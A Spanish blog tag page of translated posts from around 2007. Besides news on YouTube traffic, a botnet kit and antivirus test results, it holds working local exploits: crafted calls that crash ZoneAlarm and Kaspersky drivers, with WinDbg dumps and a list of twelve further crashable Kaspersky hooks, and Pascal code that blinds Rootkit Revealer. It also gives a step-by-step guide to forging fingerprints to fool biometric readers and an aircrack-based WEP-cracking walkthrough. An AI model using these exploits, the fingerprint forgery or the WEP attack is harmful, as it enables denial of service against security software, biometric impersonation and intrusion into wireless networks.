Entradas etiquetadas con “traducciones” de Mixelandia

Despues de ver esto, me ha quedaddo claro porque de vez encuando que me tomo unos alcoholes, comienzo uno como que a expandir la mente y ver las cosas un poco más fácil al momento de  programar.

Esta entrada es una traducción al español de la entrada que se encuentra en este blog  que a su vez ha sido modificada de esta otra

Esto solo funciona con windows y en este momento solo se puede Activar com iPod, es decir despues de esto no se pueden hacer llamadas telefonicas aun.

Cuando Google pago $1.65billones de dolares por YouTube, mucha gente se cuestiono cual era el modelo de negocios del sitio y si este seguiría creciendo en audiencia.

Por mucho la respuesta es si. Las visitas al sitio de YouTube.com han crecido en un 70 por ciento entre Enero y Mayo del 2007 (aunque le pese al sanshiro). Contextualizando se puede decir que las visitas a los otros 64 sitios para compartir vídeos ja crecido solo un 8 pociento en el mismo periodo. En efecto YouTube tiene 50% mas visitas que los otros 64 sitios combinados.

YouTube tiene el 60.02 por ciento del mercado en USA de compartir vídeos en Internet. Seguido por MySpace con el 16.08 por ciento, Google Vídeo que apenas ha logrado conseguir el 7.81 %, y después de ahí un buen bajón en las escalas. Yahoo! Vídeo tiene el 2.77% , MSN tiene 2.09 %, Break.com tien 1.33 seguido por Daily Motion con 1.13 (si sanshiro a la gente no le gusta Daily Motion).

Sin embargo las páginas de búsquedas siguen llevando el 20% de el trafico a los sitios de vídeos en Internet, lo que sugiere que la gente ha incrementado su apetito por el contenido en vídeo o que la gente suele buscar dentro del mismo sitio de vídeos.

Grafías desde Hitwise muestran que el numero de personas navengando que abandonan la página de búsquedas par ir a los sitios de vídeo se ha incrementado en un 300 % en un año, desde Mayo del 2006 a mayo del 2007.

agregado: listado y desganchado de Shadow SSDT
agregado: nuevo dialogo de acerca ;)
el sistema de actualización es ahora completamente configurable.
remivido: el banneo a GMER y el banneo a los debuggers de modo kernel

PandaLabs ha descubierto DreamSystem, un sistema para controlar varias variantes de la

familia de bots DreamSocks. la versión 1.3 de esta herramienta es la ultima que se conoce

y esta siendo vendida en varios foros por alrededor de 750 dollares. Por el dinero pagado

se incluyen actualizaciones gratuitas de nuevas versiones.

La herramienta consta de dos partees, La primera permite a los ciber-delincuentes controlar las maquinas comprometidas, convirtiéndolas en servidores, ingresando una URL en los bots,esto es para que se conecten a ella y comiencen a recibir ordenes. La segunda parte es la parte que permite enviar las ordenes a esas maquinas infectadas. Esta ultima ha sido encontrada en muchos foros, lo cual indica que hay varias botnet controladas por esta herramienta.

Los bots controlados mediante DreamSystem permiten que el atacante las convierta en zombies y también las utilice como servidores. Además también permite que el bot descargue y ejecute cualquier tipo de archivos, incluyendo otros códigos maliciosos.

En los foros donde se ha encontrado esta herramienta, esta se esta utilizando para lanzar ataques de Delegación de Servicio Distribuidos(DDoS por sus siglas en ingles) en contra de Servidores web. Esto puede ser en dos protocolos:UDP y TCP.

Los Ciber-delincuentes usan estos ataques para bloquear los servicios proporcionados por compañías que basan sus servicios en internet, -con las perdidas que esto acarrea-, si no pagan una cantidad para detener el ataque.


Las técnicas utilizadas para distribuir estas variantes de los bots van desde la utilización de exploits para infectar la maquina de usuarios, como Mpack o enviando spam con el bot como contenido.

El otro dia posteamos un exploit para KAV y ahora le toco el turno a Zone Alarm, un firewall muy usado por su servidor.
El post original esta en ingles aquí

ZoneAlarm Pro version:7.0.337.000
Driver version:7.0.337.000

Actualmente estamos trabajando con varios antivirus / firewalls y estamos probando la estabilidad de algunos de ellos . Lo cual muestra una muy mala situación. ;)

Todos adoran usar ganchos =), desafortunadamete el nivel de conocimiento de sus desarrolladores de drivers para el kernel deja mucho que desear. Simplemente no saben como manejar los ganchos en la SSDT.


Sistema: Windows XP SP2 sin PAE
Exploit: NtCreatePort pobre manejo del gancho, service id 46

NtCreatePort esta ganchada por las fucniones del driver vsdatant.sys.

Prototipo de la Función


NTSYSAPI
NTSTATUS
NTAPI
NtCreatePort(
OUT PHANDLE PortHandle,
IN POBJECT_ATTRIBUTES ObjectAttributes,
IN ULONG MaxDataSize,
IN ULONG MaxMessageSize,
IN ULONG Reserved
);


Aquí estan un pequeño exploit que conduce a un pantallazo azul.
Este exploit puede ser iniciado dsede la cuenta de invitado con derechos minimos.


NtCreatePort(nil, pointer($81234567), 0, 0, 0);


Y aquí esta el analisis de este BSOD

Originally posted by windbg


kd> !analyze -v
*******************************************************************************
* *
* Bugcheck Analysis *
* *
*******************************************************************************

PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced. This cannot be protected by try-except,
it must be protected by a Probe. Typically the address is just plain bad or it
is pointing at freed memory.
Arguments:
Arg1: 8123456f, memory referenced.
Arg2: 00000000, value 0 = read operation, 1 = write operation.
Arg3: fbfdd256, If non-zero, the instruction address which referenced the bad memory
address.
Arg4: 00000000, (reserved)

Debugging Details:
------------------

ANALYSIS: Kernel with unknown size. Will force reload symbols with known size.
ANALYSIS: Force reload command: .reload /f ntoskrnl.exe=FFFFFFFF804D7000,214600,41108004
***** Kernel symbols are WRONG. Please fix symbols to do analysis.


FAULTING_MODULE: 804d7000 nt

DEBUG_FLR_IMAGE_TIMESTAMP: 45f0fed1

READ_ADDRESS: unable to get nt!MmSpecialPoolStart
unable to get nt!MmSpecialPoolEnd
unable to get nt!MmPoolCodeStart
unable to get nt!MmPoolCodeEnd
8123456f

FAULTING_IP:
vsdatant+33256
fbfdd256 8b4808 mov ecx,dword ptr [eax+8]

MM_INTERNAL_CODE: 0

CUSTOMER_CRASH_COUNT: 4

DEFAULT_BUCKET_ID: WRONG_SYMBOLS

BUGCHECK_STR: 0x50

LAST_CONTROL_TRANSFER: from 804df06b to fbfdd256

STACK_TEXT:
WARNING: Stack unwind information not available. Following frames may be wrong.
fc65bd48 804df06b 00000000 81234567 00000000 vsdatant+0x33256
fc65bd64 7c90eb94 badb0d00 0012fe10 00000000 nt+0x806b
fc65bd68 badb0d00 0012fe10 00000000 00000000 0x7c90eb94
fc65bd6c 0012fe10 00000000 00000000 00000000 0xbadb0d00
fc65bd70 00000000 00000000 00000000 00000000 0x12fe10


STACK_COMMAND: kb

FOLLOWUP_IP:
vsdatant+33256
fbfdd256 8b4808 mov ecx,dword ptr [eax+8]

SYMBOL_STACK_INDEX: 0

SYMBOL_NAME: vsdatant+33256

FOLLOWUP_NAME: MachineOwner

MODULE_NAME: vsdatant

IMAGE_NAME: vsdatant.sys

BUCKET_ID: WRONG_SYMBOLS

Followup: MachineOwner
---------



Otro exploit con la misma técnica para el mismo firewall.


Sistema: Windows XP SP2 sin PAE
Exploit: NtCreateWaitablePort, service id 56

NtCreateWaitablePort es otra función ganchada por el driver.

Function prototype

NTSYSAPI
NTSTATUS
NTAPI
NtCreateWaitablePort(
OUT PHANDLE PortHandle,
IN POBJECT_ATTRIBUTES ObjectAttributes,
IN ULONG MaxDataSize,
IN ULONG MaxMessageSize,
IN ULONG Reserved
);



Este exploit puede ser iniciado dsede la cuenta de invitado con derechos minimos.

NtCreateWaitablePort(nil, pointer($81234567), 0, 0, 0);


Esto lleva inmediatamente a un BSOD


analisis en windbg


kd> !analyze -v
*******************************************************************************
* *
* Bugcheck Analysis *
* *
*******************************************************************************

PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced. This cannot be protected by try-except,
it must be protected by a Probe. Typically the address is just plain bad or it
is pointing at freed memory.
Arguments:
Arg1: 8123456f, memory referenced.
Arg2: 00000000, value 0 = read operation, 1 = write operation.
Arg3: fbfdd336, If non-zero, the instruction address which referenced the bad memory
address.
Arg4: 00000000, (reserved)

Debugging Details:
------------------

ANALYSIS: Kernel with unknown size. Will force reload symbols with known size.
ANALYSIS: Force reload command: .reload /f ntoskrnl.exe=FFFFFFFF804D7000,214600,41108004
***** Kernel symbols are WRONG. Please fix symbols to do analysis.


FAULTING_MODULE: 804d7000 nt

DEBUG_FLR_IMAGE_TIMESTAMP: 45f0fed1

READ_ADDRESS: unable to get nt!MmSpecialPoolStart
unable to get nt!MmSpecialPoolEnd
unable to get nt!MmPoolCodeStart
unable to get nt!MmPoolCodeEnd
8123456f

FAULTING_IP:
vsdatant+33336
fbfdd336 8b4808 mov ecx,dword ptr [eax+8]

MM_INTERNAL_CODE: 0

CUSTOMER_CRASH_COUNT: 5

DEFAULT_BUCKET_ID: WRONG_SYMBOLS

BUGCHECK_STR: 0x50

LAST_CONTROL_TRANSFER: from 804df06b to fbfdd336

STACK_TEXT:
WARNING: Stack unwind information not available. Following frames may be wrong.
f89ded48 804df06b 00000000 81234567 00000000 vsdatant+0x33336
f89ded64 7c90eb94 badb0d00 0012fe10 f90f5d98 nt+0x806b
f89ded68 badb0d00 0012fe10 f90f5d98 f90f5dcc 0x7c90eb94
f89ded6c 0012fe10 f90f5d98 f90f5dcc 00000000 0xbadb0d00
f89ded70 f90f5d98 f90f5dcc 00000000 00000000 0x12fe10
f89ded74 f90f5dcc 00000000 00000000 00000000 0xf90f5d98
f89ded78 00000000 00000000 00000000 00000000 0xf90f5dcc


STACK_COMMAND: kb

FOLLOWUP_IP:
vsdatant+33336
fbfdd336 8b4808 mov ecx,dword ptr [eax+8]

SYMBOL_STACK_INDEX: 0

SYMBOL_NAME: vsdatant+33336

FOLLOWUP_NAME: MachineOwner

MODULE_NAME: vsdatant

IMAGE_NAME: vsdatant.sys

BUCKET_ID: WRONG_SYMBOLS

Followup: MachineOwner
---------



Estamo seguros que existen otros ganchos codificados de una manera deficiente, mas ya no seguimos probando otros.


Saludos
EP_X0FF/UG North

Programas antivirus de varias compañías de nivel mundial han fallado en la mayor prueba de malware la VB100

Los productos de Kaspersky, Grisoft, y F-Secure han fallado en detectar el 100% del malware que se encuentran en la base de datos de Virus Bulletin, anqué en alguna ocasión ya habían pasado esta prueba.

De los 37 productos probados, 10 fallaron al momento de demostrar sus habilidades de detección necesitarías para obtener la certificación VB100.

Kaspersky Anti-Virus 6.0.2.621 fallo en detectar el gusano de internet llamado allaple. De acuerdo con el consultor de tecnología de Kaspersky, David Emm, Kaspersky había agregado la firma para el gusano en Febrero. Sin embargo al momento de la prueba, Kaspersky se encontraba "optimizando" la firma del allape, y la firma no se encontraba en la base de datos de Kaspersky.

Grisoft AVG 7.5 professional Edition también fallo en el VB100. AVG es una aplicación antimalware gratuita muy conocida, que tiene una gran aceptación.

Larry Bridwellm el estratega general de seguridad de Grisoft, dijo que la parte de este anti-malware, AVG 7.5 Professional Edition, que detecta firmas ha fallado al detectar una de las variantes del Troyano Agobot, pero que la parte anti-spyware del producto lo había detectado. "Las pruebas son al momento de accesar los archivos a nivel hardware" comento Bridwell. Cuando se probo el AVG 7.5 Professional Edition, encontramso el bot en la parte del anty spyware, la cual es sobre demanda [el programa tiene que iniciarse de forma manual]. Deberíamos de haber detectado el malware al momento del acceso.

Al igual que Kaspersky el servicio de protección para clientes de F-Secure (7.00 buil 387) fallo al detectar el Allaple. La compañía dijo que había cometido un error al no enviar las últimas actualizaciones de su base de datos. "El producto enviado a la prueba no incluía las ultimas actualizaciones", comentó F-Secure. "El programa que probado off line, lo cual no permitió al programa actualizarse a la ultima versión en la base de datos. En el ambiente del usuario normal la base de datos se hubiera actualizado de manera automática.

Todas estas pruebas fueron realizadas en Windows XP.

Hoy les traigo otro exploit el cual tiene que ver con Rootkit Revealer, es una traducción directa del texto publicado por EP_X0FF en los foros de sysinternals aquí
nota:
Solamente usenlo si realmnente saben lo que hacen...

Rootkit Revelaler (RKR) es un detector de Rookits muy conocido el cual es usado para revelar algunos rootkits de modo usuario así como algunas cuantas cosas del modo kernel.

Puede detectar archivos ocultos haciendo lecturas de modo RAW y usando su propio parser para el sistema de archivos. Puede detectar entradas ocultas en el registro volcando directamente desde el disco por medio de un driver y la función ZwSaveKey y utilizando su propio parser para esto.

Existen varias maneras de sobrepasar completamente a RKR, pero el detector mismo puede ayudarte a sobrepasarlo. Esta vulnerabilidad esta presente en todas las versiones de RKR inclusive en las más antiguas versiones de línea de comando.

El objetivo principal del exploit es usar restricciones del sistema de archivos que también están presentes en RKR. El exploit crea un árbol de 1024 directorios es decir cada uno esta dentro del anterior, y después copia calc.exe (la calculadora de windows) en el último directorio creado con el nombre “test.exe”. Después de crear este exploit cualquier escaneada al disco con RKR será completamente inútil, porque cuando RKR pase por el directorio del exploit este comenzara a mostrar todo los directorios y archivos como "Visible in Windows API, MFT, but not in directory index".

Usando este exploit con las viejas versiones de consolas genera un error de violación de acceso.

El codigo del exploit se muestra a continuación…

Advertencia:

Debido a las raices del Sitema de Archivos y a las restricciones de la Ínterfaz Grafica de Windows no es sencillo eliminar el exploit del disco. Así que no lo uses en una maquina real si no sabes como eliminar el archivo.

var

 i: integer;

 buf: array[0..100000] of wchar;

 buf2: LBuf;

begin

 memzero(@buf, sizeof(buf));

 GetWindowsDirectoryW(buf2, MAX_PATH);

 strcpyW(buf, '\\?\C:\adir');

 CreateDirectoryW(buf, nil);

 for i := 0 to 1023 do

 begin

   strcatW(buf, '\adir');

   CreateDirectoryW(buf, nil);

 end;

 strcatW(buf, '\test.exe');

 strcatW(buf2, '\calc.exe');

 CopyFileW(buf2, buf, false);

end;

Este no es un exploit “puro” debido a que no genera escalación de privilegios. Este se puede clasificar como uno del tipo DoS (Denegación del Servicio).

Para corregir esta vulnerabilidad es necesario modificar RKR para soportar rutas UNC.

Después de que ayer se publicara acerca de la Vulnerabilidad de KAS 7.0 Kaspersky Lab reacciono diciendo que no fueron notificados a tiempo con todo y que la vulnerabilidad tenia un año o mas he aquí lo que Kaspersky respondió hoy

El enlace original en ingles

Un consultor (EP_X0FF), recientemente ha publicado en rootkit.com acerca de una vulnerabilidad en KAV 7.0. Desafortunadamente el autor de este material no se ha apegado a la practica estándar de la industria, de contactar a la empresa desarrolladora antes de divulgar los detalles de la vulnerabilidad. Aunque el autor afirma que todos los intentos de informar a Kaspersky Lab acerca de esta vulnerabilidad, fueron ignorados, este no ha sido el caso: Si hubiéramos sido informados, este hecho hubiera sido resuelto desde mucho tiempo atrás.

Los siguientes productos son vulnerables:

Kaspersky Internet Security 6.0/7.0
Kaspersky Anti-Virus 6.0/7.0
Kaspersky Anti-Virus for Windows Workstations 6.0
Kaspersky Anti-Virus 6.0 for Windows Servers

Estos productos son vulnerables solo cuando se ejecutan en los siguientes SOs:


Windows NT
Windows 2000
Windows 2003 x86
Windows XP x86
Productos corriendo en otros SO de Microsoft no son afectados por este percance.

Esta vulnerabilidad esta clasificada como de bajo riesgo debido a la naturaleza de la misma: El usuario tiene que lanzar el exploit manualmente en su computadora. El resultado de explotar esta vulnerabilidad es un error critico del sistema (BSOD) pero no hay una escalación de privilegios o provee algún control de el equipo en forma remota.

Un parche para esta vulnerabilidad sera lanzado en estos días. El parche se instalara estomáticamente. Daremos mas información cuando se lance el parche.

Seguramente que a los señores de KAV esta información no les cayo muy en gracia pero en fin alguine la tenia que publicar...

Saludos

Esta es una traducción de una entrada que hizo el buen EP_X0FF en los foros de sysinternals
y que pueden leer en ingles aquí

El bien conocido antivirus Kaspersky, desde hace un buen tiempo sufre de un bug muy peligroso, el cual permite tronar el sistema protegido por este antivirus, aun desde la cuenta de invitado.

Todos los intentos de avisar a Kaspersky Lab sobre esta vulnerabilidad han sido ignorados. Este material fue mostrado varios años atras, y en el ultimo verano publicamos un nuevo exploit para Kaspersky AV 6.0 el cual se basa en los descubrimientos previos de Ms-Rem. Y despues de este tiempo nada ha cambiado. Aun ahora con la nueva version Kaspersky AV 7.0 este exploit sigue funcionando muy bien.
El objetivo principal de este exploit es hacer una llamda a NtOpenProcess con parametros invalidios. Esta funcion esta intervenida (hooked) por el diver de Kaspersky llamdo klif.sys y la reazon para este intercepción es obia - Esta es la manera en que Kaspersky AV se protege de accesos no autorizados que pudieran cerrar el proceso, esto es muy usado por el malware.

Aqui el prototipo de esta función

NTSYSAPI
NTSTATUS
NTAPI
NtOpenProcess( OUT PHANDLE ProcessHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes,
IN PCLIENT_ID ClientId OPTIONAL );


Aquí un pequeño exploit codificado en pascal(funciona para el klif.sys vesion 6.12.10.280 y versiones previas)


var
ob1: OBJECT_ATTRIBUTES;
p1: DWORD;
begin
ob1.Length := sizeof(ob1);
NtOpenProcess(@p1, PROCESS_QUERY_INFORMATION, @ob1, pointer($82000000));
end;

Como podran ver el ultimo parametro es la dirección de la estructura CLIENT_ID, la cual apunta hacia una región aleatoria dentro de la memoria del kernel.
al probar el xploit en una instalación limpia de windows XP , sin KAV -no hay BSOD(Blue Screen Of Death o Pantallazo azul).

Al ejecutarlo en un Windows XP protegido por KAV 7.0 -inmediatamente tenemos un BSOD - PAGE_FAULT_IN_NONPAGED_AREA.

Pero ¿Porque pasa esto? la respuesta es muy sencilla. Supongo que el codigo fuente de el hook en NtOpenProcess es algo como esto:

NTSTATUS NewNtOpenProcess (
OUT PHANDLE ProcessHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes,
IN PCLIENT_ID ClientId OPTIONAL)
{
__try
{

if (ClientId->UniqueProcess == KasperskyProcesss) return STATUS_ACCESS_DENIED;

else return RealNtOpenProcess(ProcessHandle, DesiredAccess,
ObjectAttributes, ClientId);
__except (EXCEPTION_EXECUTE_HANDLER)
{
... stuff here ...
}
}

El gran problema aquí es ClientId->UniqueProcess, ya que ClientId es un PUNTERO a una estructura. El hecho de accesar a una región invalida de memoria produce inmediatamente un PAGE_FAULT_IN_NONPAGED_AREA.


el exploit original fue creado por Ms-Rem y luce así


NtOpenProcess(NULL, (HANDLE)0, NULL, NULL);

Comopodras observar los desarrolladores de KAV han usado un bloque try/except, y parece ser que no saben usar otro tipo de funciones manejadoras de erores.

Esperemos que los desarrolladores de Kaspersky Antivirus descubran el fabuloso programa llamado NtCall y corrigan su bug.


*******************************************************************************
* *
* Bugcheck Analysis *
* *
*******************************************************************************

PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced. This cannot be protected by try-except,
it must be protected by a Probe. Typically the address is just plain bad or it
is pointing at freed memory.
Arguments:
Arg1: 83000000, memory referenced.
Arg2: 00000000, value 0 = read operation, 1 = write operation.
Arg3: f941840c, If non-zero, the instruction address which referenced the bad memory
address.
Arg4: 00000000, (reserved)

Debugging Details:
------------------

ANALYSIS: Kernel with unknown size. Will force reload symbols with known size.
ANALYSIS: Force reload command: .reload /f ntoskrnl.exe=FFFFFFFF804D7000,214600,41108004
***** Kernel symbols are WRONG. Please fix symbols to do analysis.

***** Kernel symbols are WRONG. Please fix symbols to do analysis.


MODULE_NAME: klif

FAULTING_MODULE: 804d7000 nt

DEBUG_FLR_IMAGE_TIMESTAMP: 46260f1c

READ_ADDRESS: unable to get nt!MmSpecialPoolStart
unable to get nt!MmSpecialPoolEnd
unable to get nt!MmPoolCodeStart
unable to get nt!MmPoolCodeEnd
83000000

FAULTING_IP:
klif+1940c
f941840c 0fbe08 movsx ecx,byte ptr [eax]

MM_INTERNAL_CODE: 0

CUSTOMER_CRASH_COUNT: 1

DEFAULT_BUCKET_ID: WRONG_SYMBOLS

BUGCHECK_STR: 0x50

LAST_CONTROL_TRANSFER: from f941b39a to f941840c

STACK_TEXT:
WARNING: Stack unwind information not available. Following frames may be wrong.
f64c8d24 f941b39a 83000000 00000008 00000000 klif+0x1940c
f64c8d64 7c90eb94 badb0d00 0012f3e4 00000000 klif+0x1c39a
f64c8d68 badb0d00 0012f3e4 00000000 00000000 0x7c90eb94
f64c8d6c 0012f3e4 00000000 00000000 00000000 0xbadb0d00
f64c8d70 00000000 00000000 00000000 00000000 0x12f3e4


STACK_COMMAND: kb

FOLLOWUP_IP:
klif+1940c
f941840c 0fbe08 movsx ecx,byte ptr [eax]

SYMBOL_STACK_INDEX: 0

FOLLOWUP_NAME: MachineOwner

IMAGE_NAME: klif.sys

SYMBOL_NAME: klif+1940c

BUCKET_ID: WRONG_SYMBOLS

Followup: MachineOwner

Algunos descubrimientos hechos por UG North muestran que hay otras funciones que tambien estan intervenidas por klif.sis las cuales pueden ser explotadas con ataques similares.

Lista de entradas en la SSDT explotables (Windows XP / KAV 7.0.0.55)

==================================
|[Idx] [nombre de la función] |
==================================
|[41 ] NtCreateKey
|[47 ] NtCreateProcess
|[48 ] NtCreateProcessEx
|[50 ] NtCreateSection
|[52 ] NtCreateSymbolicLinkObject
|[53 ] NtCreateThread
|[65 ] NtDeleteValueKey
|[99 ] NtLoadKey2
|[119] NtOpenKey
|[122] NtOpenProcess
|[125] NtOpenSection
|[177] NtQueryValueKey
==================================
Cualquier llamada a esas funciones con parametros invalidos, llevara a un BSOD.

Este tipo de exploit fue descubierto por Ms-Rem en el 2005 y funciona para KAV 5.0

Como se mostro este exploit funciona para todas la versiones de Kaspersky Antivirus incluyendo la nueva versión 7.0.

¿Realmente aun crees quie estas portegido?

"Online security is an important topic for Google, our users, and anyone who uses the Internet. The related issues are complex and dynamic and we've been looking for a way to foster discussion on the topic and keep users informed. Thus, we've started this blog where we hope to periodically provide updates on recent trends, interesting findings, and efforts related to online security. Among the issues we'll tackle is malware, which is the subject of our inaugural post."


http://googleonlinesecurity.blogspot.com/

Así versa la primer entrada del nuevo blog de seguridad de google, espero que nos den buenos consejos acerca de protección sobre nuestras computadoras.

Este blog nos deja ver que google esta comenzando a preocuparse por la seguridad de sus usuarios, y que busca maneras de mantenernos informados.

Lo único malo para muchos de los usuarios de habla hispana es que esta en ingles, pero tratare de vez en cuando de poner algunas entradas traducidas, claro citando la fuente original...

Saludos

Navegando por la red me tope con este método para copiar huellas digitales y engañar a los aparatitos que las leen.

articulo original en ingles aquí

Para poder crear huellas digitales falsas, primeramente necesitamos una original. Recordemos que las huellas digitales no son otra cosa sino que sudor y grasa sobre los objetos tocados. Para obtener la huella digital de alguien más (en este caso la huella digital que quieres copiar) uno debe de basarse en las técnicas forenses que han demostrado ser muy efectivas.
En la figura 1 podemos ver una huella digital.

(Figura 1) residuos grasosos de una huella digital.




Una buena fuente para obtener las huellas digitales son los vasos, las chapas de las puertas y el papel brilloso. El método forense estándar que las hace visibles es el siguiente: Espolvorearlo con talco coloreado, el cual se pega a la grasa (figura 2).



Figure 2: Visualización con polvo de grafito

Otra solución envuelve al cianocrilato, el ingrediente principal de la cola loca. Se coloca una pequeña cantidad en el fondo una tapa de refresco, la cual se coloca sobre la huella (Figura 3).


Figure 3: Visualización con súper pegamento



Los gases de Cianocrilato reaccionan con la grasa, generando una substancia blanca y solida (Figura 4).



Figura 4: la huella después del cianocrilato.



Lo siguiente envuelve escanear/fotografiar (figura 5) y un poco de tratamiento gráfico (Figura 6).



Figura 5: Digitalizando la huella.




Figure 6: retocando la imagen para la impresión.



El objetivo de esto es obtener una imagen de la huella digital, para usarla como molde,
Del cual se hace la copia. La manera más fácil de imprimir la imagen es sobre acetatos, (los que se usan comúnmente para el retroproyector) con una impresora laser. El tóner forma un relieve, el cual es usado de una forma parecida al prensado con letras. El pegamento para madera es adecuado para producir la copia (Figura 7).




Figura 7: pegamento para madera usado para la copia.

Se pude usar una pequeña cantidad de glicerina para mejora la humedad y la usabilidad. Después de mezclar bien, el molde es cubierto por una capa del compuesto (Figuras 8,9)



Figura 8: Cubriendo el molde con el pegamento.



Figura 9: Capa de pegamento sobre la impresión.


Después de que el pegamento ha secado (Figura 10), es retirado y cortado del tamaño del dedo.


Figura 10: Pegamento endurecido



Figura 11: Copia, lista para usarse

Pegamento para teatro es usado para pegar la copia al dedo (Figura 12).


Figura 12: La nueva identidad esta lista.

¡La nueva identidad esta lista!

Esta es una pequeña traducción de un entrevista realizada a los creadores de este ataque.

Lanoa original esta en ingles aquí.
Extracto

WEP esta muerto y aquí la prueba.

Crackear el algoritmo de seguridad para WIFI "WEP" es un juego de probabilidad. el número de paquetes requerido para desencriptar la clave depende de varios factores, incluyendo suerte.

Cuando WEP fue rota en 2001, el ataque necesitaba mas de 5 millones de paquetes para funcionar. Durante el verano de 2004, un hacker llamado KoreK publico un nuevo ataque para WEP llamado Chopper que redujo considerablemente la cantidad de paquetes requeridos, permitiendo que la gente crackeara las llaves, con cientos de miles de paquetes, en vez de millones de estos.

El mes pasado, res investigadores, Erik Tews, Andrei Pychkine y Ralf-Philipp Weinmann
desarrollaron un ataque mas rápido (basándose en el criptoanálisis del RC4 de Andreas Klein),que trabaja con paquetes ARP y que solo necesita 85,000 paquetes para crackear la llave con un 95% de probabilidad. Esto significa obtener la llave en menos de 2 minutos.

pero ¿Cómo funciona el ataque?

Paso1: Encuentra al enemigo (esto es la red de pruebas que creaste en tu laboratorio), solo para verificar los resultados). Puedes usar airodump para encontrarla.

Paso 2: Generar algo de tráfico. Para generar algo de tráfico, usa aireplay-ng en modo ARP injection. Airplay buscara en la red hasta que encuentre un paquete ARP encriptado. Reinjectando este paquete una y otra vez, generaras mucho trafico, y así sabrás que la mayoría de trafico es trafico-ARP. Para un packete ARP, se conocen los 16 primeros Bytes de texto en claro y entonces también los primeros 16 bytes del cipherstream.

Paso 3: Escribe este trafico al disco usando airodump-ng. Esto creara un archivo con el trafico TCP capturado.

Paso 4: Lanza el algoritmo. Necesitaras aircrack-ptw (por cierto, aircrack-ptw ha sido integrado en la versión 0.9-dev de aircrack-ng, la cual esta actualmente en svn, pero no ha sido lanzada).


Desde un punto de vista teórico, el algoritmo se basa en las siguientes ideas.
Andreas Klein, un investigador alemán, demostró que hay una correlación en RC4 entre los Keybytes 1 al i-1, la keystrem y el keybyte i. Si los keybytes 1 al i-1 y la keystream son conocidos, es posible adivinar el siguiente keybyte con una probabilidad de 1.36/256 lo cual es un poco máyor que 1/256. Esto permite que sea posible adivinar la suma de los keybytes i hasta i+k con una probabilidad de mas de 1.24/256.

En el ambiente de WEP, los primeros tres bytes de un paquete clave, siempre son conocidos y son llamados IV. Esta herramienta trata de adivinar la suma de los siguientes 1,2,3, ... hasta 13 keybytes para cada paquete. Si se han capturado los paquetes suficientes, el valor adivinado un numero mayor de veces par una suma, usualmente sera el numero correcto. Si no el valor correcto en la mayoría de los casos sera uno de los mas adivinados.

Aircrack-ptw trata de encontrar la clave, usando la idea descrita anteriormente. Si se tienen de 40,000 a 85,000 paquetes, la probabilidad de éxito, estará entre el 50 y el 95 por ciento.

Soporte completo Vista 32bit build 6000
Se agrego un nuevo método de detección de procesos ocultos
La tecnología del Stealth Walker fue mejorada dramáticamente, ahora puede revelar mas rootkits.
Nueva Página – Detector de Código Oculto, la cual te mostrara casi todo el código que se está ejecutando en el modo kernel.
El Detector de Código Oculto esta soportado por algunos métodos de detección basados en phide_ex / Rustock y la tecnología de Unreal
El modulo de soporte para NTFS ha sido reescrito para eliminar algunos viejos errores
VX contien código especial para sobrepasar la nueva evolución de los toyanos que utilizan ganchos en la SSDT
La detección de Ganchos inline fue mejorada.
Fecha preliminar de liberación: verano del 2007